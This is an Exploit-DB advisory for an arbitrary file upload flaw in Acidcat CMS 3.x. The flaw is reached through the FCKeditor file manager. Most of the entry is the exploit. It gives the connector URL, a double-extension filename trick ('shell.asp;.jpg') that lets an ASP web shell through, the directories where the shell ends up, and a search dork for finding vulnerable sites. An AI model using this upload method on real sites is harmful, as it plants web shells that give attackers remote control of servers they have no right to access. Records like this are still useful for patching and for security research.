Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload

EDB-ID:

15597

CVE:

N/A

EDB Verified:

Author:

Net.Edit0r

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2010-11-22

Vulnerable App:

============================================================================== 
 
        [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
 
============================================================================== 
 
    [»] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
 
    [»] Script  :           [ Mini-NUKE v2.3  ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
 
    [»] Author  :           [ Net.Edit0r - black.hat.tm@gmail.com }
 
    [»] My Home :           [ ajaxtm.com and datacoders.org ] 
 
    [»] Date    :           [ 2010-11-23 ] 
  
    [»] Version :           [ 3.3.X and 3.2.x ]

    [»] Dork    :           [ "Powered by Acidcat CMS " ]

   
 
########################################################################### 
 
    
===[ Exploit ]=== 
 
 
  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp 
 
  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

  [»] http://server/read_write/file/[Shell] 

  [»] http://server/public/File/[Shell]


Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

     BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic  ~ keracker
                                  
 
###########################################################################

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services